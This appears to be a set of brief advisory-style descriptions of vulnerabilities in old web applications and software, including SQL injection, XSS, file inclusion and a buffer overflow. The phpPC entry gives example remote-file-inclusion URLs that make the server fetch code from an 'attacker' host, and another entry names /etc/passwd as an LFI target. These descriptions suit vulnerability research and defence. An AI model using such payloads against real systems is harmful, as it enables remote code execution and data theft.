fipsGallery version 1.5 is vulnerable to a remote SQL injection vulnerability. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. This can allow an attacker to gain access to the database and execute arbitrary SQL commands.
The Zyxel Prestige 660H-61 ADSL Router is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to have arbitrary script code execute in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
This exploit allows an attacker to inject malicious SQL code into the vulnerable fipsCMS v4.5 application. The exploit is triggered when the vulnerable application receives a specially crafted HTTP request containing malicious SQL code. This code is then executed in the backend database, allowing the attacker to gain access to sensitive information such as passwords.
phpPC 1.04 is vulnerable to multiple Remote File Inclusion vulnerabilities. The vulnerable files are poll.php, poll_kommentar.php and poll_sm.php. In poll.php, the vulnerable code is located at line 13, in poll_kommentar.php, the vulnerable code is located at line 18 and in poll_sm.php, the vulnerable code is located at line 8. An attacker can exploit these vulnerabilities by sending a malicious URL to the vulnerable application. For example, in poll.php, an attacker can send a malicious URL like http://localhost/phppc/poll.php?is_phppc_included=1&relativer_pfad=http://attacker/inject.txt?. Similarly, in poll_kommentar.php, an attacker can send a malicious URL like http://localhost/phppc/poll_kommentar.php?is_phppc_included=1&relativer_pfad=http://attacker/inject.txt? and in poll_sm.php, an attacker can send a malicious URL like http://localhost/pcc/poll_sm.php?is_phppc_included=1&relativer_pfad=ftp://attacker/inject.txt?.
The Pearl Forums application is vulnerable to Insecure Direct Object Reference due to the lack of proper input validation. This allows an attacker to inject malicious code into the application by manipulating the 'templatesDirectory' parameter in the vulnerable scripts such as admin.php, password.php, profile.php, merge.php, and adminPolls.php.
XMPlay 3.3.0.4 and lower experiance a stack-based buffer overflow when loading malformed .ASX files. This merely executes CALC.exe but you could always add your own custom shellcode (alpha2).
Outpost Firewall is prone to a local denial-of-service vulnerability. An attacker can exploit this issue to crash the application, effectively denying service.
aBitWhizzy is a web application developed by Unverse.net. It is vulnerable to a Local File Include vulnerability. An attacker can exploit this vulnerability by sending a crafted HTTP request to the vulnerable application. This can allow the attacker to include a local file on the server, such as the /etc/passwd file. This can lead to the disclosure of sensitive information.
The 'pageid' parameter isn't properly sanitised before being returned in sql query and can be used to inject craft SQL queries, we can use Blind SQL Injection attack to disclose admin credential. Works regardless of magic quotes.
Forum 5 is prone to a local file-include vulnerability. The application fails to sanitize user input when executing the script. In particular the script fails to check for the presence of a directory-traversal sequence ('../'). A successful exploit may allow unauthorized users to view files and to execute local scripts; other attacks are also possible.